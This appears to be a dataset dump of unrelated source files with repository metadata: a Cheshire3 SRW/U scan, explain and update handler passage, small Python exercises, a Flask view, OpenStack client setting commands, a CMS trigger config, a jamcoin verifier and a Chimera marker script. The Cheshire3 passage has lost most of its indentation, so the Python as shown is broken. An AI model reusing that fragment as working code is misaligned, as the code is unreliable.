self.diagnostics = req.diagnostics
return
mt = req.get('maximumTerms')
rp = req.get('responsePosition')
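    # responsePosition says where the seed term sits in the returned list:
    # 1 = first, 0 = immediately before the list, mt = last, mt+1 =
    # immediately after; any other value scans both directions around it.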
if (rp < 0 or rp > (mt+1)):
f = Diagnostic120()
f.message = "Response position out of range"
f.details = str(rp)
raise f
if (not clause.term.value):
clause.term.value = chr(0)
clause.config = config
if (rp == 1):
data = db.scan(session, clause, mt, direction=">=")
elif (rp == 0):
data = db.scan(session, clause, mt, direction=">")
elif (rp == mt):
data = db.scan(session, clause, mt, direction="<=")
data.reverse()
elif (rp == mt+1):
data = db.scan(session, clause, mt, direction="<")
data.reverse()
else:
# Need to go up and down
data1 = db.scan(session, clause, mt-rp+1, direction=">=")
data = db.scan(session, clause, rp, direction="<=")
if data1[0][0] == data[0][0]:
data = data[1:]
data.reverse()
data.extend(data1)
for d in data:
t = SRW.types.ScanTerm('ScanTerm')
t.value = d[0]
t.numberOfRecords = d[1][1]
process_extraData(config.termExtensionHash, req, t, d)
self.terms.append(t)
process_extraData(config.scanExtensionHash, req, self)
process_extraData(config.responseExtensionHash, req, self)
SRW.types.ScanResponse.processQuery = process_scan
def process_explain(self, session, req):
if (not req.version):
diag = Diagnostic7()
diag.message = "Mandatory 'version' parameter not supplied"
diag.details = 'version'
raise diag
config = req.config
self.echoedExplainRequest = req
p = config.get_path(session, 'zeerexPath')
if (not os.path.isabs(p)):
p2 = config.get_path(session, 'defaultPath')
p = os.path.join(p2, p)
f = open(p, "r")
if f:
filestr = f.read()
# insert some database metadata
db = config.parent
session.database = db.id
try:
from lxml import etree
except ImportError:
# possibly try a slower DOM API, but for now...
pass
else:
nsHash = {'zrx':"http://explain.z3950.org/dtd/2.0/" ,'c3':"http://www.cheshire3.org/schemas/explain/"}
et = etree.XML(filestr)
dbNode = et.xpath('//zrx:explain/zrx:databaseInfo', namespaces=nsHash)[0]
try: impNode = dbNode.xpath('//zrx:implementation', namespaces=nsHash)[0]
except IndexError:
impNode = etree.XML('''<implementation identifier="http://www.cheshire3.org" version="%d.%d.%d">
<title>Cheshire3 SRW/U Server</title>
<agents>
<agent type="vendor">The University of Liverpool</agent>
</agents>
</implementation>''' % internal.cheshireVersion)
dbNode.append(impNode)
if db.totalItems:
try: extNode = dbNode.xpath('//zrx:extent', namespaces=nsHash)[0]
except IndexError:
etree.SubElement(dbNode, 'extent', {'numberOfRecords': str(db.totalItems)})
else:
extNode.set('numberOfRecords', str(db.totalItems))
if db.lastModified:
try: histNode = dbNode.xpath('//zrx:history', namespaces=nsHash)[0]
except IndexError:
# create history and append node
etree.SubElement(dbNode, 'history', {'lastUpdate': db.lastModified})
else:
histNode.set('lastUpdate', db.lastModified)
filestr = etree.tostring(et) # serialise modified record to string
# Create a record object and populate
rec = SRW.types.Record('record')
rec.recordPacking = req.recordPacking
if (req.recordPacking == 'string'):
filestr = escape(filestr)
rec.recordSchema = config.recordNamespaces['zeerex']
rec.recordData = filestr
self.record = rec
process_extraData(config.explainExtensionHash, req, self)
process_extraData(config.responseExtensionHash, req, self)
SRW.types.ExplainResponse.processQuery = process_explain
# ----- Update v0.4 -----
# TODO: Update record update implementation
SRW.update.ExplainResponse.processQuery = process_explain
def unpack_record(self, session, req):
declre = re.compile('<\?xml(.*?)\?>')
if req.record:
packing = req.record.recordPacking
if packing == "string":
data = req.record.recordData
data = declre.sub('', data)
doc = StringDocument(data)
elif packing == "url":
raise NotImplementedError
elif packing == "xml":
# Should be a DOM node, not string repr?
doc = StringDocument(req.record.recordData)
else:
diag = Diagnostic1()
raise diag
doc._schema = req.record.recordSchema
else:
doc = None
return doc
SRW.update.UpdateResponse.unpack_record = unpack_record
def fetch_record(self, session, req):
if (req.recordIdentifier):
db = req._db
recStore = db.get_path(session, 'recordStore')
val = req.recordIdentifier
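        # The identifier is either a bare numeric id, or "storeId/id" to
        # address a record held in a specific record store.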
if val.isdigit():
val = int(val)
else:
try:
(storeid, id) = val.split('/', 1)
recStore = db.get_object(session, storeid)
if (id.isdigit()):
id = int(id)
except ValueError, e:
diag = Diagnostic1()
diag.details = "Could not parse record id"
raise diag
if not isinstance(recStore, RecordStore):
diag = Diagnostic1()
raise diag
else:
return recStore.fetch_record(session, id)
else:
return None
SRW.update.UpdateResponse.fetch_record = fetch_record
def handle_create(self, session, req):
db = req._db
rec = self.fetch_record(session, req)
if rec:
# Record already exists.
diag = Diagnostic1()
diag.details = "Already exists"
raise diag
doc = self.unpack_record(session, req)
# Need to get a 'create' workflow
if doc:
flow = req.config.workflowHash['info:srw/operation/1/create']
rec = flow.process(session, doc)
else:
# Create an empty record
recStore = db.get_path(session, 'recordStore')
rec = recStore.create_record(session, None)
recStore.commit_storing()
self.recordIdentifier = repr(rec)
self.operationStatus = "success"
SRW.update.UpdateResponse.handle_create = handle_create
def handle_delete(self, session, req):
db = req._db
rec = self.fetch_record(session, req)
if not rec:
diag = Diagnostic1()
raise diag
else:
flow = req.config.workflowHash['info:srw/operation/1/delete']
flow.process(session, rec)
self.operationStatus = "success"
SRW.update.UpdateResponse.handle_delete = handle_delete
def handle_replace(self, session, req):
db = req._db
rec = self.fetch_record(session, req)
doc = self.unpack_record(session, req)
if not rec:
diag = Diagnostic1()
diag.details = "No record found"
raise diag
elif not doc:
diag = Diagnostic1()
diag.details = "No replacement"
raise diag
else:
flow = req.config.workflowHash['info:srw/operation/1/delete']
flow.process(session, rec)
flow2 = req.config.workflowHash['info:srw/operation/1/create']
flow2.process(session, doc)
self.operationStatus = "success"
SRW.update.UpdateResponse.handle_replace = handle_replace
def handle_metadata(self, session, req):
diag = Diagnostic1()
diag.details = "Not yet supported"
self.diagnostics = [diag]
SRW.update.UpdateResponse.handle_metadata = handle_metadata
def process_update(self, req):
self.version = "1.1"
self.operationStatus = "fail"
if (not req.version):
diag = Diagnostic7()
diag.message = "Mandatory 'version' parameter not supplied"
diag.details = 'version'
raise diag
config = req.config
db = config.parent
req._db = db
session = Session()
session.environment = "apache"
session.database = db.id
if req.operation == "info:srw/operation/1/create":
# Do Create
self.handle_create(session, req)
elif req.operation == "info:srw/operation/1/replace":
# Do Replace
self.handle_replace(session, req)
elif req.operation == "info:srw/operation/1/delete":
# Do Delete
self.handle_delete(session, req)
elif req.operation == "info:srw/operation/1/metadata":
# Do Metadata update
self.handle_metadata(session, req)
else:
# Barf
diag = SRWDiagnostics.Diagnostic1()
diag.details = "Unknown operation: %s" % req.operation
self.diagnostics = [diag]
SRW.update.UpdateResponse.processQuery = process_update
| [
"[email protected]"
] | |
3a7381f58e016c17acdda37ca348942621b67a30 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02269/s429567531.py | b6858b987c9d3f9e958f07c18273052b8af703cd | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | def insert(S, string):
S.add(string)
def find(S, string):
if string in S:
print 'yes'
else:
print 'no'
n = input()
S = set()
for i in range(n):
tmp1, tmp2 = map(str, raw_input().split())
if tmp1 == 'insert':
insert(S, tmp2)
elif tmp1 == 'find':
find(S, tmp2)
else:
print 'error!' | [
"[email protected]"
] | |
ef505cea73e5c3037f00f3f90d9413b53a1b61a9 | f5d43e47e375d6d337b919b8eb7f3393e4687864 | /lpthw/31-40/ex40_test.py | 989e12ee9cc1788d320fcf11b770a64ba098454b | [] | no_license | Cadols/LearnPython | 4a2c202b30a1d877ec75e0ec45b03f9f1c2bc52a | 2ab5cefe1f7e2c0393489e3d1d4d0c88557c2ebb | refs/heads/master | 2021-01-12T09:49:48.335014 | 2019-05-24T06:53:42 | 2019-05-24T06:53:42 | 76,265,981 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,081 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
class Song(object):
def __init__(self, lyrics):
self.lyrics = lyrics
def sing_me_a_song(self):
for line in self.lyrics:
print(line)
twinkle_twinkle_little_star = Song(["Twinkle twinkle little star",
"How I wonder what you are",
"Up above in the sky",
"Like a diamond in the sky"])
alphabet_song = Song(["A B C D E F G",
"H I J K L M N",
"O P Q",
"R S T",
"U V W",
"X Y Z"])
twinkle_twinkle_little_star.sing_me_a_song()
alphabet_song.sing_me_a_song()
song_a_lyrics = ["Twinkle twinkle little star", "How I wonder what you are", "Up above in the sky", "Like a diamond in the sky"]
song_b_lyrics = ["A B C D E F G", "H I J K L M N", "O P Q", "R S T", "U V W", "X Y Z"]
song_a = Song(song_a_lyrics)
song_b = Song(song_b_lyrics)
song_a.sing_me_a_song()
song_b.sing_me_a_song()
| [
"[email protected]"
] | |
39420f4dd8ab7e282152b8a385260ae3dba14513 | a5c4e1ab36972c0bbc2526612a9ade95768b32b1 | /ailtdou/main/views.py | 0b1bc567a56e9b5a702bf5eee1b8e4cb4008b087 | [] | no_license | tonyseek/ailtdou | 5587e76e3c34b3533c73d2acded5b8134bbd8ad3 | 435cad7fd127a6fc7974b1413ec0299ca2dd359d | refs/heads/master | 2021-01-23T00:14:55.509037 | 2018-10-13T12:46:27 | 2018-10-13T12:46:27 | 19,821,141 | 0 | 0 | null | 2018-08-14T07:14:38 | 2014-05-15T13:54:50 | Python | UTF-8 | Python | false | false | 286 | py | from flask import Blueprint, render_template
from flask_login import current_user
bp = Blueprint('main', __name__)
@bp.route('/')
def home():
if current_user.is_anonymous():
return render_template('login.html')
return render_template('user.html', user=current_user)
| [
"[email protected]"
] | |
c6443e9e4d16553be2ab62035dacb3504dc0b0e7 | 94ca446c0f17d640f45941fa7c83530ef2fbc099 | /wrs-remote-clients-2.0.2/python-openstackclient-3.12.0/build/lib/openstackclient/network/v2/setting.py | d404325e8ea16391d3a58e77a79b68bf48806a91 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | rmoorewrs/tic-windows-remote-clients | c1c2b8924e90ffd2951571bc098ec9873ffd3988 | ae16ee78a720852304d79f8b86dfe44e920cc72d | refs/heads/master | 2023-05-25T13:55:55.603100 | 2019-05-31T20:59:28 | 2019-05-31T20:59:28 | 189,649,925 | 0 | 0 | NOASSERTION | 2023-05-22T20:43:59 | 2019-05-31T19:46:28 | Python | UTF-8 | Python | false | false | 6,210 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Copyright (c) 2016 Wind River Systems, Inc.
#
# The right to copy, distribute, modify, or otherwise make use
# of this software may be licensed only pursuant to the terms
# of an applicable Wind River license agreement.
#
"""Settings action implementations"""
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from openstackclient.i18n import _
from openstackclient.identity import common as identity_common
from openstackclient.network import common
from openstackclient.network import sdk_utils
_formatters = {}
def _get_columns(item):
column_map = {"id": "project_id"}
invisible_columns = ["name"]
return sdk_utils.get_osc_show_columns_for_sdk_resource(item, column_map,
invisible_columns)
def _get_attrs(client_manager, parsed_args):
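    # Keep only the attributes the caller actually supplied; when a project
    # name/ID is given, resolve it to a project_id via the identity client.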
attrs = {key: parsed_args[key] for key in ["mac_filtering"]
if key in parsed_args}
if 'project' in parsed_args and parsed_args["project"] is not None:
identity_client = client_manager.identity
project_id = identity_common.find_project(
identity_client,
parsed_args["project"]
).id
attrs['project_id'] = project_id
return attrs
class ListSetting(common.NetworkAndComputeLister):
"""List settings of all projects who have non-default setting values"""
def update_parser_common(self, parser):
return parser
def take_action_network(self, client, parsed_args):
columns = (
'mac_filtering',
'project_id'
)
column_headers = (
'Mac Filtering',
'Project ID'
)
args = {}
data = client.settings(**args)
return (column_headers,
(utils.get_item_properties(
s, columns,
formatters=_formatters,
) for s in data))
def take_action_compute(self, client, parsed_args):
raise exceptions.CommandError("This command needs access to"
" a network endpoint.")
return
class ShowSetting(common.NetworkAndComputeShowOne):
"""Show settings of a given project"""
def update_parser_common(self, parser):
parser.add_argument(
'--project',
metavar='<project>',
help=_("Owner's project (name or ID)"),
required=False
)
return parser
def take_action_network(self, client, parsed_args):
client = self.app.client_manager.network
# if no project id is specified, operate on current project
args = _get_attrs(self.app.client_manager, vars(parsed_args))
if not "project_id" in args:
args["project_id"] = client.find_tenant().project_id
project_id = args["project_id"]
obj = client.find_setting(project_id, ignore_missing=False)
display_columns, columns = _get_columns(obj)
data = utils.get_item_properties(obj, columns, formatters=_formatters)
return (display_columns, data)
def take_action_compute(self, client, parsed_args):
raise exceptions.CommandError("This command needs access to"
" a network endpoint.")
return
# this one uses NetworkAndComputeCommand because settings can be deleted
# without a project id
class DeleteSetting(common.NetworkAndComputeCommand):
"""Delete setting"""
def update_parser_common(self, parser):
parser.add_argument(
'--project',
metavar='<project>',
help=_("Owner's project (name or ID)"),
required=False
)
return parser
def take_action_network(self, client, parsed_args):
client = self.app.client_manager.network
# if no project id is specified, operate on current project
args = _get_attrs(self.app.client_manager, vars(parsed_args))
if not "project_id" in args:
args["project_id"] = client.find_tenant().project_id
project_id = args["project_id"]
client.delete_setting(project_id)
return
def take_action_compute(self, client, parsed_args):
raise exceptions.CommandError("This command needs "
"access to a network endpoint.")
return
class UpdateSetting(command.Command):
"""Set setting properties"""
def get_parser(self, prog_name):
parser = super(UpdateSetting, self).get_parser(prog_name)
parser.add_argument(
'--project',
metavar='<project>',
help=_("Owner's project (name or ID)"),
required=False
)
parser.add_argument('--mac-filtering', metavar='mac_filtering',
help="Enable/Disable source MAC filtering"
" on all ports",
required=True)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.network
# if no project id is specified, operate on current project
args = _get_attrs(self.app.client_manager, vars(parsed_args))
if not "project_id" in args:
args["project_id"] = client.find_tenant().project_id
project_id = args["project_id"]
del args['project_id']
client.find_setting(project_id, ignore_missing=False)
if args == {}:
msg = "Nothing specified to be set"
raise exceptions.CommandError(msg)
client.update_setting(project_id, **args)
return
| [
"[email protected]"
] | |
4dcda6e3044084bdf2aa6af4f9ccad28c448e2bb | 2455062787d67535da8be051ac5e361a097cf66f | /Producers/BSUB/TrigProd_amumu_a5_dR5/trigger_amumu_producer_cfg_TrigProd_amumu_a5_dR5_691.py | bd6632802d1ac740f25ab863bcfb3124a43b8893 | [] | no_license | kmtos/BBA-RecoLevel | 6e153c08d5ef579a42800f6c11995ee55eb54846 | 367adaa745fbdb43e875e5ce837c613d288738ab | refs/heads/master | 2021-01-10T08:33:45.509687 | 2015-12-04T09:20:14 | 2015-12-04T09:20:14 | 43,355,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,360 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("PAT")
#process.load("BBA/Analyzer/bbaanalyzer_cfi")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.load('Configuration.EventContent.EventContent_cff')
process.load("Configuration.Geometry.GeometryRecoDB_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("PhysicsTools.PatAlgos.producersLayer1.patCandidates_cff")
process.load("PhysicsTools.PatAlgos.selectionLayer1.selectedPatCandidates_cff")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'MCRUN2_71_V1::All', '')
process.load("Configuration.StandardSequences.MagneticField_cff")
####################
# Message Logger
####################
process.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(100)
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )
## switch to uncheduled mode
process.options.allowUnscheduled = cms.untracked.bool(True)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(500)
)
####################
# Input File List
####################
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('root://eoscms//eos/cms/store/user/ktos/RECO_Step3_amumu_a5/RECO_Step3_amumu_a5_691.root'),
secondaryFileNames = cms.untracked.vstring()
)
############################################################
# Defining matching in DeltaR, sorting by best DeltaR
############################################################
process.mOniaTrigMatch = cms.EDProducer("PATTriggerMatcherDRLessByR",
src = cms.InputTag( 'slimmedMuons' ),
matched = cms.InputTag( 'patTrigger' ), # selections of trigger objects
matchedCuts = cms.string( 'type( "TriggerMuon" ) && path( "HLT_Mu16_TkMu0_dEta18_Onia*")' ), # input does not yet have the 'saveTags' parameter in HLT
maxDPtRel = cms.double( 0.5 ), # no effect here
maxDeltaR = cms.double( 0.3 ), #### selection of matches
maxDeltaEta = cms.double( 0.2 ), # no effect here
resolveAmbiguities = cms.bool( True ),# definition of matcher output
resolveByMatchQuality = cms.bool( True )# definition of matcher output
)
# talk to output module
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string("file:RECO_Step3_amumu_a5_TrigProd_691.root"),
outputCommands = process.MINIAODSIMEventContent.outputCommands
)
process.out.outputCommands += [ 'drop *_*_*_*',
'keep *_*slimmed*_*_*',
'keep *_pfTausEI_*_*',
'keep *_hpsPFTauProducer_*_*',
'keep *_hltTriggerSummaryAOD_*_*',
'keep *_TriggerResults_*_HLT',
'keep *_patTrigger*_*_*',
'keep *_prunedGenParticles_*_*',
'keep *_mOniaTrigMatch_*_*'
]
################################################################################
# Running the matching and setting the the trigger on
################################################################################
from PhysicsTools.PatAlgos.tools.trigTools import *
switchOnTrigger( process ) # This is optional and can be omitted.
switchOnTriggerMatching( process, triggerMatchers = [ 'mOniaTrigMatch'
])
process.outpath = cms.EndPath(process.out)
| [
"[email protected]"
] | |
108663704ef930b8ae22d2ab13c3c6ab61c0cef9 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3/Sean223/verify.py | 9ca777f0f93c2d4c309547e0376387d1fabe7ab7 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,426 | py | IN_FILE = "large.txt"
with open(IN_FILE, 'r') as fileIn:
fileLines = fileIn.readlines()
it = iter(fileLines)
assert(next(it).strip() == 'Case #1:')
jamcoins_found = []
for i in range(1, 501):
message = "Jamcoin on line " + str(i)
line = next(it).strip().split()
if not len(line) == 10:
print(message + " had the wrong number of divisors listed!")
jamcoin = line[0]
if jamcoin in jamcoins_found:
print(message + " was a duplicate!!")
jamcoins_found.append(jamcoin)
if not jamcoin[0] == '1':
print(message + " did not start with 1!")
if not jamcoin[-1] == '1':
print(message + " did not end with 1!")
for digit in jamcoin:
if digit not in ('0', '1'):
print(message + " had a non-binary digit!")
if not len(jamcoin) == 32:
print(message + " did not have 32 digits!")
for base in range(2, 11):
proposed_divisor = int(line[base-1])
jamcoin_in_base = int(jamcoin, base)
if proposed_divisor == 1 or proposed_divisor == jamcoin_in_base:
print(message + " had a trivial divisor listed for base " + str(base))
if not jamcoin_in_base % proposed_divisor == 0:
print(message + " did not have a correct divisor listed for base " + str(base))
if not len(jamcoins_found) == 500:
print("Did not find 500 jamcoins!")
| [
"[[email protected]]"
] | |
0bc0c90132733dee274a4c250af2557a3807546b | 5574620c834f96d4baf50d6aa349242dae7c17af | /172.factorial-trailing-zeroes.py | 37c2400fe3fdb6a94b967b7880dcca016d4f563b | [] | no_license | Ming-H/leetcode | 52dceba5f9a605afbdaa65e286a37205873e21bb | 057cee4b830603ac12976ed7d5cea8d06a9b46a0 | refs/heads/main | 2023-09-02T21:30:48.796395 | 2023-09-01T01:59:48 | 2023-09-01T01:59:48 | 489,290,172 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | #
# @lc app=leetcode id=172 lang=python3
#
# [172] Factorial Trailing Zeroes
#
# @lc code=start
class Solution:
def trailingZeroes(self, n: int) -> int:
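        # Each trailing zero of n! needs a factor of 10 = 2 * 5; twos are
        # plentiful, so just count factors of 5: n//5 + n//25 + n//125 + ...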
r = 0
while n > 0:
n //= 5
r += n
return r
# @lc code=end
| [
"[email protected]"
] | |
1310ca612a18d36486b9f755bcbff9756da40ecc | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_34363.py | 4adad9b5db9a1bcae4005a3b8c7a2a480b3303be | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,839 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
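# Each block below fetches or creates a named marker set, then places a
# single marker: place_marker(xyz_coordinates, rgb_color, radius).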
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((463.03, 615.441, 586.439), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((435.252, 551.517, 585.94), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((395.458, 481.406, 585.935), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((346.022, 591.453, 654.784), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((329.838, 301.054, 554.949), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((448.856, 571.409, 589.806), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((449.961, 573.045, 590.146), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((464.274, 596.365, 596.552), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((471.604, 601.497, 623.292), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((481.087, 587.864, 646.05), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((478.173, 574.946, 670.864), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((500.29, 558.397, 666.919), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((459.303, 592.27, 573.42), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((544.93, 522.969, 755.951), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((461.856, 359.103, 671.702), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((461.856, 359.103, 671.702), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((466.584, 383.418, 658.269), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((469.21, 408.41, 644.77), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((472.187, 434.749, 633.626), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((469.974, 460.904, 621.858), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((469.293, 485.766, 607.281), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((452.998, 506.566, 595.643), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((489.582, 389.33, 822.51), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((423.122, 630.145, 368.908), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((438.145, 480.835, 565.963), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((438.145, 480.835, 565.963), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((414.717, 498.44, 563.469), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((386.317, 505.164, 565.389), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((371.19, 506.819, 590.189), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((406.822, 626.084, 598.243), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((332.443, 387.855, 589.797), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((416.906, 574.29, 589.199), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((416.88, 574.312, 589.205), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((423.943, 576.44, 562.068), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((448.522, 562.629, 557.49), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
